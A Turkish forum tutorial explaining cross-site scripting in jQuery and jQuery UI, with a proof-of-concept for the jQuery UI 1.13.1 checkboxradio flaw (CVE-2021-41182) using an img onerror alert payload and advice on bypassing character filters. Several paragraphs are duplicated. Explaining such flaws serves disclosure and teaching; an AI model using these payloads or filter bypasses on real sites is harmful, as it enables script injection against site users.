Merhaba bu gün sizlere önceden paylaştığım jquery 3.5 ve altında olan xss açığını detaylıca anlatacağım.
Xss açığı temel anlamda girilen bir javascript kodunun herhangi bir denetimden geçmeden çalıştırılmasıyla oluşur.
Jquery versiyonlarında bulunan bu açık sürümden sürüme biraz farklılık göstermektedir.
1.8 versiyonunda bulunan bir labı çözümleyerek bu açığı anlatıp ardından 1.13 versiyonunda nasıl oluştuğunu belirterek konuyu bitireceğim.
Herhangi bir url veya gösterilen resim değeri bir web sayfası üstünden dönmeye ayarlanmışsa url kısmında siteadı.com/xss?örnek=/ tarzında bir bitiş verilir.
Bu bitiş kullanıcıdan bir verinin direk alınması veya arkaplanda buraya otomatik bir yerleştirmeyle yeniden düzenlenip karşınıza anlamlı bir veri çıkmasını sağlar.
Örneğin bir post işleminde işlenmesi düzenlemesi gibi durumlarda çalıştırılacak resim dosyası script tagları içinde işleniyorsa veya direkt olarak sayfada çalışıyorsa bu açık oluşabilir.
Buradaki analizimiz ise bu açığın ve filtrelenen kelimelerin neler olduğunu anlayarak bunu sömürme üstüne kuruludur.
Bazen html karakterler bakımından filtrelemeler olursa 1.13 versiyonundaki örnekteki kullanacağımız gibi "<" işareti yerine "<" bunu kullanarak bypass edebiliriz.
yukarıdaki url'de ise eğer siteadı.com/xss?örnek=/ daki / silip bir veri girerek sayfada işleniyor mu kaynak kodlarda arayarak ulaşabiliriz.
Gördüğünüz gibi işlendi artık xss kodumuzu yazabiliriz.
Bir diğer versiyondaki 1.13.1 xss ise
Xss açığı temel anlamda girilen bir javascript kodunun herhangi bir denetimden geçmeden çalıştırılmasıyla oluşur.
Jquery versiyonlarında bulunan bu açık sürümden sürüme biraz farklılık göstermektedir.
1.8 versiyonunda bulunan bir labı çözümleyerek bu açığı anlatıp ardından 1.13 versiyonunda nasıl oluştuğunu belirterek konuyu bitireceğim.
Herhangi bir url veya gösterilen resim değeri bir web sayfası üstünden dönmeye ayarlanmışsa url kısmında siteadı.com/xss?örnek=/ tarzında bir bitiş verilir.
Bu bitiş kullanıcıdan bir verinin direk alınması veya arkaplanda buraya otomatik bir yerleştirmeyle yeniden düzenlenip karşınıza anlamlı bir veri çıkmasını sağlar.
Örneğin bir post işleminde işlenmesi düzenlemesi gibi durumlarda çalıştırılacak resim dosyası script tagları içinde işleniyorsa veya direkt olarak sayfada çalışıyorsa bu açık oluşabilir.
Buradaki analizimiz ise bu açığın ve filtrelenen kelimelerin neler olduğunu anlayarak bunu sömürme üstüne kuruludur.
Bazen html karakterler bakımından filtrelemeler olursa 1.13 versiyonundaki örnekteki kullanacağımız gibi "<" işareti yerine "<" bunu kullanarak bypass edebiliriz.
yukarıdaki url'de ise eğer siteadı.com/xss?örnek=/ daki / silip bir veri girerek sayfada işleniyor mu kaynak kodlarda arayarak ulaşabiliriz.
Gördüğünüz gibi işlendi artık xss kodumuzu yazabiliriz.
Bir diğer versiyondaki 1.13.1 xss ise
Kod:
[/COLOR][/CENTER][/COLOR][/CENTER]
[COLOR=rgb(251, 160, 38)][CENTER][COLOR=rgb(251, 160, 38)][CENTER]<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.13.1/jquery-ui.min.js"></script>
<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.13.1/themes/base/jquery-ui.css">
<label>
<!-- XSS -->
<img src=1 onerror=alert('deneme')>
<input type="radio" name="radio" class="radio">
</label>
<!-- Default Initialization of Checkboxes -->
<script>
$('.radio').checkboxradio();
</script>
<!-- Refresh of Checkboxes after some time or event will trigger XSS -->
<script>
setTimeout(function () {
$('.radio').checkboxradio('refresh');
}, 3000)
</script>Gördüğünüz gibi radio butonu değeri direk olarak işleme alındığı için ve ">" "<" kullanımına dikkat edildiği için xss çalışmış oldu.
Fixleme işlemleri ise yerine göre whitelist, ip kontrolü veya htmlspecialchars (php) kullanılarak yapılması gerekmektedir.
Bazı sürümlerde ise img olarak xss oluşabilmektedir.
Xss açığı daha detaylı ve farklı bir kullanımı ise önceden çektiğimiz bir eğitim videosunda bulunmaktadır.
19.dakikadan sonrasını izleyebilirsiniz.
İlgili yazılar ve yararlanılan makaleler:
Snyk Vulnerability Database | Snyk
Medium severity (6.1) Cross-site Scripting (XSS) in jquery-ui | CVE-2021-41182
security.snyk.io
İyi Forumlar
